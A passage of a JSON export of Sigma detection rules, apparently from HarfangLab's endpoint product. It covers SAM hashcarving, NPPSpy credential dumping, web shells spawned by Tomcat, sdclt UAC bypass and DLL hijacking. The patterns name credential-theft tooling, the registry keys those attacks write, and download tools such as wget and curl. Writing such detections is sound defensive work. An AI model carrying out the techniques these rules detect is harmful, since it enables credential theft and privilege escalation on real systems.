"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083717Z",
"creation_date": "2026-03-23T11:45:34.083719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083723Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/rapid7/metasploit-framework/blob/2382d7530cf0cf2aa4ac63be30c98ca3fcdd6bbf/modules/post/windows/manage/hashcarve.rb",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_004_metasploit_hashcarve.yml",
"content": "title: Possible Hashcarving in SAM Hive\nid: 43dff950-782f-403b-8b2b-8a2d3025027b\ndescription: |\n Detects the injection of a custom NTLM hash on a user account directly inside the SAM registry hive.\n This technique, known as hashcarving, can be used by attackers to create users without triggering detection related to normal Windows API user creation.\n It is recommended to investigate the processes and alerts surrounding this action to determine its legitimacy.\nreferences:\n - https://github.com/rapid7/metasploit-framework/blob/2382d7530cf0cf2aa4ac63be30c98ca3fcdd6bbf/modules/post/windows/manage/hashcarve.rb\n - https://attack.mitre.org/techniques/T1078/\ndate: 2020/11/06\nmodified: 2025/08/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.t1003.004\n - attack.t1112\n - attack.t1078\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: 'SAM\\SAM\\Domains\\Account\\'\n ProcessImage|contains: '?'\n\n filter_trusted:\n - ProcessImage:\n - '?:\\Windows\\system32\\lsass.exe'\n - '\\Device\\\\*\\Windows\\System32\\lsass.exe'\n - ProcessImage|endswith: '\\dismhost.exe'\n ProcessSigned: 'true'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_jumpcloud:\n ProcessImage: '?:\\Program Files\\JumpCloud\\jumpcloud-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JumpCloud Inc'\n\n exclusion_cybereason:\n # HKLM\\SOFTWARE or HKLM\\$OFFLINE_RW_BCE441CA$SOFTWARE\\C\n - TargetObject: 'HKLM\\\\*SOFTWARE\\Cybereason\\ActiveProbe\\AuditBackup\\MACHINE\\SAM\\SAM\\Domains\\Account\\Users'\n Details: 'S:PAINO_ACCESS_CONTROL'\n - TargetObject: 'HKLM\\SOFTWARE\\Cybereason\\ActiveProbe\\AuditBackup\\MACHINE\\SAM\\SAM\\Domains\\Account\\Users'\n ProcessParentImage: '?:\\Program Files\\Cybereason ActiveProbe\\ActiveConsole\\ActiveConsole.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43dff950-782f-403b-8b2b-8a2d3025027b",
"rule_name": "Possible Hashcarving in SAM Hive",
"rule_description": "Detects the injection of a custom NTLM hash on a user account directly inside the SAM registry hive.\nThis technique, known as hashcarving, can be used by attackers to create users without triggering detection related to normal Windows API user creation.\nIt is recommended to investigate the processes and alerts surrounding this action to determine its legitimacy.\n",
"rule_creation_date": "2020-11-06",
"rule_modified_date": "2025-08-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.004",
"attack.t1078",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "440871d7-5765-49ca-9cab-da1ca38a5fb1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085856Z",
"creation_date": "2026-03-23T11:45:34.085858Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085862Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy",
"https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nppasswordchangenotify",
"https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_mpnotify_load_nppspy_dll.yml",
"content": "title: Credential Dumped via NPPSpy\nid: 440871d7-5765-49ca-9cab-da1ca38a5fb1\ndescription: |\n Detects when \"NPPSpy.dll\" is loaded by \"mpnotify.exe\".\n NPPSpy is used by attackers to receive notifications from \"winlogon.exe\" when a user logs in or changes password.\n With this, an attacker will get access to credentials in clear text.\n It is recommended to download and check the loaded DLL.\n It is also recommended to investigate how and when this DLL was created on the filesystem.\nreferences:\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy\n - https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nppasswordchangenotify\n - https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify\n - https://attack.mitre.org/techniques/T1003/\ndate: 2021/08/26\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.NPPSpy\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\mpnotify.exe'\n ImageLoaded|endswith: '\\NPPSPY.dll'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "440871d7-5765-49ca-9cab-da1ca38a5fb1",
"rule_name": "Credential Dumped via NPPSpy",
"rule_description": "Detects when \"NPPSpy.dll\" is loaded by \"mpnotify.exe\".\nNPPSpy is used by attackers to receive notifications from \"winlogon.exe\" when a user logs in or changes password.\nWith this, an attacker will get access to credentials in clear text.\nIt is recommended to download and check the loaded DLL.\nIt is also recommended to investigate how and when this DLL was created on the filesystem.\n",
"rule_creation_date": "2021-08-26",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "442d705c-9fa0-41d4-8e09-02c18684f5c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628131Z",
"creation_date": "2026-03-23T11:45:34.628133Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628138Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.aquasec.com/blog/tomcat-under-attack-investigating-the-mirai-malware/",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1203_tomcat_suspicious_shell.yml",
"content": "title: Suspicious Shell Executed by Tomcat\nid: 442d705c-9fa0-41d4-8e09-02c18684f5c3\ndescription: |\n Detects the execution of a suspicious shell by the Tomcat web server software likely related to a web shell or a command injection via a vulnerable application.\n Adversaries may backdoor web servers with web shells to establish persistent access to systems.\n It is recommended to verify the legitimacy of this command and check any other command executed by the Tomcat server.\nreferences:\n - https://www.aquasec.com/blog/tomcat-under-attack-investigating-the-mirai-malware/\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2021/09/17\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.persistence\n - attack.t1505.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # TODO: Centos checking\n selection:\n # NOTE: Tomcat is executed via java and its main class is 'org.apache.catalina.startup.Bootstrap'\n ParentImage|endswith: 'java'\n ParentCommandLine|contains: 'org.apache.catalina.startup.Bootstrap'\n User:\n - 'root'\n - 'www-data'\n - 'tomcat'\n\n selection_image:\n Image|contains:\n - '/bin/'\n - '/sbin/'\n - '/tmp/'\n - '/dev/shm/'\n\n selection_command:\n CommandLine|contains: 'sh -c '\n\n # This is handled by the rule e021ad68-b12f-4190-b70f-e79e622e5860\n filter_t1203_tomcat_suspicious_command:\n - Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n - '/cat'\n - '/crontab'\n - '/hostname'\n - '/ifconfig'\n - '/ip'\n - '/iptables'\n - '/ls'\n - '/netstat'\n - '/pwd'\n - '/route'\n - '/whoami'\n - '/w'\n - CommandLine|contains: 'sh -c uname'\n\n exclusion_java:\n # Exclude java childrens\n Image|endswith: '/java'\n\n exclusion_system_bin:\n Image|endswith:\n - '/dirname'\n - '/tty'\n - '/setfiles'\n - '/chkconfig'\n - '/getent'\n - '/getconf'\n - '/ldconfig'\n - '/lscpu'\n - '/systemctl'\n - '/su'\n - '/sudo'\n - '/dash'\n - '/bash'\n - '/id'\n - '/usr/bin/timeout'\n\n exclusion_image:\n Image|endswith:\n - '/libgvc6-config-update'\n - '/convert-im6.q16' # ImageMagick\n - '/magick'\n - '/soffice.bin'\n - '/libreoffice/program/.soffice.bin'\n - '/usr/local/bin/pdf2svg'\n - '/usr/bin/stream'\n - '/usr/bin/clamscan'\n - '/usr/bin/ffprobe'\n - '/opt/jalios/bin/pdf2svg/*/bin/pdf2svg'\n\n exclusion_ulimit:\n CommandLine: 'bash -c ulimit -u'\n\n exclusion_iparapheur:\n CommandLine: 'grep -E /opt/iParapheur/common'\n\n exclusion_iparapheur_pdf:\n Image|endswith:\n - '/iParapheur/common/lib/libriciel-pdf'\n - '/iParapheur/common/bin/.pdf2swf.bin'\n # /opt/iParapheur/common/lib/libriciel-pdf -t -f /opt/iParapheur/alf_data/contentstore/2022/1/4/9/46/4c434528-76e9-4e69-ac52-acb2afc1b0a8.bin\n # /opt/iParapheur/common/bin/.pdf2swf.bin -V\n CommandLine:\n - '*/iParapheur/common/lib/libriciel-pdf */iParapheur/alf_data/contentstore/*'\n - '*/iParapheur/common/lib/libriciel-pdf */iParapheur/tomcat/temp/*'\n - '*/iParapheur/common/bin/.pdf2swf.bin -V'\n\n exclusion_iparapheur_scripts:\n # /bin/sh /opt/iParapheur/common/bin/pdf2swf -V\n # /bin/sh /opt/iParapheur/common/bin/convert input output\n CommandLine:\n - '/bin/sh */iParapheur/common/bin/pdf2swf -V'\n - '/bin/sh */iParapheur/common/bin/convert*'\n\n exclusion_iparapheur_imagemagicks:\n # /opt/iParapheur/common/bin/.convert.bin input output\n - Image|endswith: '/iParapheur/common/bin/.convert.bin'\n - CommandLine: '/usr/bin/convert */iParapheur/tomcat/temp/Alfresco/ImageMagickContentTransformerWorker_init_source_* /iParapheur/tomcat/temp/Alfresco/ImageMagickContentTransformerWorker_init_target_*'\n\n # /opt/iParapheur/openoffice/program/soffice.bin --accept=socket,host=0,port=8100,tcpNoDelay=1;urp;StarOffice.ServiceManager -env:UserInstallation=file:///opt/iParapheur/alf_data/oouser --headless --nodefault --nofirststartwizard --nolockcheck --nologo --norestore --invisible\n exclusion_iparapheur_openoffice:\n Image|endswith: '/iParapheur/openoffice/program/soffice.bin'\n\n exclusion_iparapheur_convert:\n CommandLine|startswith: '/usr/bin/convert /opt/iParapheur/'\n\n exclusion_ldconfig:\n CommandLine:\n - '/sbin/ldconfig.real -p'\n - '/bin/sh /sbin/ldconfig -p'\n\n exclusion_alfresco_1:\n # /usr/bin/convert /opt/alfresco-4.2.8/tomcat/bin/../temp/Alfresco/ImageMagickContentTransformerWorker_source_5538363677025863519.pdf[0] -auto-orient -resize 100x150 /opt/alfresco-4.2.8/tomcat/bin/../temp/Alfresco/ImageMagickContentTransformerWorker_target_7368150091786604679.png\n CommandLine|contains|all:\n - '/usr/bin/convert '\n - 'alfresco'\n - 'ImageMagickContentTransformerWorker_source_'\n - 'ImageMagickContentTransformerWorker_target_'\n\n exclusion_alfresco_2:\n Image: '/opt/alfresco/alfresco-pdf-renderer/alfresco-pdf-renderer'\n\n exclusion_vadesecure_checkurl:\n # /opt/vadesecure/checkurl/vr2om-exploreurl.6.0\n Image:\n - '/opt/vadesecure/checkurl/vr2om-exploreurl.?.?'\n - '///opt/vadesecure/checkurl/vr2om-exploreurl.?.?'\n\n exclusion_alfresco_3:\n CommandLine:\n - '*/libreoffice/program/soffice.bin* -env:UserInstallation=file:///opt/tomcat/alfresco/*'\n - '/opt/libreoffice/program/soffice.bin *'\n - '/bin/ps -e -ww -o pid,args'\n\n exclusion_getent:\n CommandLine:\n - 'getent passwd'\n - 'getent group'\n\n exclusion_grangle:\n CommandLine:\n - 'rm -f /GRANGLE/appserver/tomcat/*/temp/null*.sh'\n - 'chmod --reference /GRANGLE/*'\n - '/GRANGLE/appserver/jdk/*/bin/keytool -importcert -file /GRANGLE/*'\n - 'chgrp * /GRANGLE/*/versions'\n - 'chown * /GRANGLE/*/versions'\n - '/GRANGLE/appserver/apache/*/bin/httpd -k graceful'\n - '/GRANGLE/appserver/apache/*/bin/httpd -k start'\n - '/GRANGLE/appserver/apache/*/bin/httpd -k stop'\n - 'chmod * /GRANGLE/*'\n - 'chown * /GRANGLE/*'\n - 'chgrp * /GRANGLE/*'\n - 'cp * /GRANGLE/* /GRANGLE/*'\n - 'ps -eaf'\n - 'ps -e -o uid,pid,cmd'\n ParentImage:\n - '/GRANGLE/appserver/jdk/*/bin/java'\n - '/appli/*/GRANGLE/appserver/jdk/*/bin/java'\n\n exclusion_sound_treatment:\n CommandLine|startswith:\n - 'sox '\n - 'lame '\n\n exclusion_sleep:\n CommandLine: 'sleep 1'\n\n exclusion_jalios:\n CommandLine|startswith: '/usr/bin/convert /opt/jalios'\n\n exclusion_converters:\n Image:\n - '/usr/bin/convert'\n - '/usr/bin/pdftotext'\n - '/usr/bin/pdftohtml'\n - '/usr/bin/wpd2text'\n\n exclusion_exiftool:\n CommandLine:\n - '/usr/bin/perl -w /bin/exiftool'\n - '/usr/bin/perl /bin/perldoc /bin/exiftool'\n\n exclusion_atempo_tina:\n CommandLine|startswith: '/tina/atempowebinterfaces/php/bin/'\n\n exclusion_amethis:\n ParentCommandLine|contains: '/amethis/server/java/bin/java'\n Image: '/usr/bin/kill'\n\n exclusion_mgr_libmod:\n Image: '/usr/bin/python3*'\n CommandLine: '/usr/bin/python3 /usr/bin/mgr-libmod'\n\n exclusion_jspawnhelper:\n # /data/ventes/bin/jdk17.0.3/lib/jspawnhelper\n Image|endswith: '/jspawnhelper'\n\n exclusion_p4:\n CommandLine:\n - '/usr/bin/p4 files *'\n - '/usr/bin/p4 dirs *'\n\n exclusion_git:\n CommandLine: '/usr/bin/git --version'\n\n exclusion_ps:\n CommandLine:\n - '/bin/ps -e -o pid,args'\n - 'ps * --noheader'\n - 'ps -fT -U *'\n\n exclusion_jmap:\n Image|endswith: '/jdk*/bin/jmap'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "442d705c-9fa0-41d4-8e09-02c18684f5c3",
"rule_name": "Suspicious Shell Executed by Tomcat",
"rule_description": "Detects the execution of a suspicious shell by the Tomcat web server software likely related to a web shell or a command injection via a vulnerable application.\nAdversaries may backdoor web servers with web shells to establish persistent access to systems.\nIt is recommended to verify the legitimacy of this command and check any other command executed by the Tomcat server.\n",
"rule_creation_date": "2021-09-17",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4442a1d3-9bb5-49a9-923a-a787f259e6ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084381Z",
"creation_date": "2026-03-23T11:45:34.084383Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084388Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_sdclt.yml",
"content": "title: UAC Bypass via sdclt Prepared\nid: 4442a1d3-9bb5-49a9-923a-a787f259e6ff\ndescription: |\n Detects the preparation of the sdclt.exe UAC bypass, involving the setting of multiple registry keys.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/11\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\folder\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\exefile\\shell\\runas\\command\\IsolatedCommand'\n - 'HKU\\\\*\\folder\\\\*SymbolicLinkValue'\n - 'HKU\\\\*\\exefile\\\\*SymbolicLinkValue'\n - 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\\(Default)'\n filter_is_empty:\n Details:\n - '(Empty)'\n - ''\n\n selection_rename:\n EventType:\n - 'RenameKey'\n - 'RenameValue'\n NewName:\n - 'HKU\\\\*_Classes\\folder\\\\*'\n - 'HKU\\\\*_Classes\\exefile\\\\*'\n - 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe'\n\n exclusion_explorer:\n Details: '%systemroot%\\explorer.exe'\n\n condition: ((selection_set_value and not 1 of filter_*) or selection_rename) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4442a1d3-9bb5-49a9-923a-a787f259e6ff",
"rule_name": "UAC Bypass via sdclt Prepared",
"rule_description": "Detects the preparation of the sdclt.exe UAC bypass, involving the setting of multiple registry keys.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-11",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "446938b0-0a64-4dac-83f6-62f25e5d6617",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295053Z",
"creation_date": "2026-03-23T11:45:35.295057Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295063Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_last_macos.yml",
"content": "title: Last Logged-in Users Discovered via Last (macOS)\nid: 446938b0-0a64-4dac-83f6-62f25e5d6617\ndescription: |\n Detects the execution of the last command.\n Attackers may use it during the discovery phase of an attack to retrieve the most recent login of all users or of given users.\n It is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/last'\n ParentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage: '/Library/Application Support/LANDesk/bin/ldapm'\n\n exclusion_meraki:\n ParentCommandLine: '/Library/Application Support/Meraki/m_agent --verbose --log /var/log/m_agent.log --pid-file /var/run/m_agent.pid'\n\n exclusion_ocsinventory:\n - ParentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n - GrandparentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n\n exclusion_fusion_inventory:\n - ParentImage: '/opt/fusioninventory-agent/bin/perl'\n - GrandparentImage: '/opt/fusioninventory-agent/bin/perl'\n\n exclusion_glpi:\n - ParentImage: '/Applications/GLPI-Agent/bin/perl'\n - GrandparentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_landesk:\n ParentImage: '/Library/Application Support/LANDesk/bin/ldiscan'\n\n exclusion_hagent:\n - GrandparentImage: '/Library/Application Support/HN/base/bin/HNagent'\n - CurrentDirectory: '/Library/Application Support/HN/base/bin'\n\n exclusion_meshagent:\n ParentImage|startswith: '/usr/local/mesh_services/'\n\n exclusion_ivanti:\n ParentImage: '/usr/local/com.ivanti.cloud.agent/IvantiAgent/bin/stagentd.app/Contents/MacOS/stagentd'\n\n exclusion_adobe:\n ParentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/com.adobe.acrobat.*.??????/preinstall '\n\n exclusion_dotnet:\n ParentImage: '/usr/local/share/dotnet/dotnet'\n\n exclusion_atera:\n ParentImage: '/Library/Application Support/com.atera.ateraagent/Packages/AgentPackageAgentInformation/AgentPackageAgentInformationApp.app/Contents/MacOS/AgentPackageAgentInformationApp'\n\n exclusion_manageengine:\n ParentImage: '/Library/ManageEngine/UEMS_Agent/bin/dcconfig'\n\n exclusion_globalprotect:\n ParentImage: '/Applications/GlobalProtect.app/Contents/MacOS/GlobalProtect'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "446938b0-0a64-4dac-83f6-62f25e5d6617",
"rule_name": "Last Logged-in Users Discovered via Last (macOS)",
"rule_description": "Detects the execution of the last command.\nAttackers may use it during the discovery phase of an attack to retrieve the most recent login of all users or of given users.\nIt is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "44948abc-3053-4899-af2a-e5a77e12bbba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097813Z",
"creation_date": "2026-03-23T11:45:34.097815Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097819Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sandboxiebits.yml",
"content": "title: DLL Hijacking via SandboxieBITS.exe\nid: 44948abc-3053-4899-af2a-e5a77e12bbba\ndescription: |\n Detects potential Windows DLL Hijacking via SandboxieBITS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SandboxieBITS.exe'\n ImageLoaded|endswith: '\\SbieDll.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Sandboxie'\n - '?:\\Program Files (x86)\\Sandboxie'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Sandboxie'\n - '?:\\Program Files (x86)\\Sandboxie'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'SANDBOXIE L.T.D'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
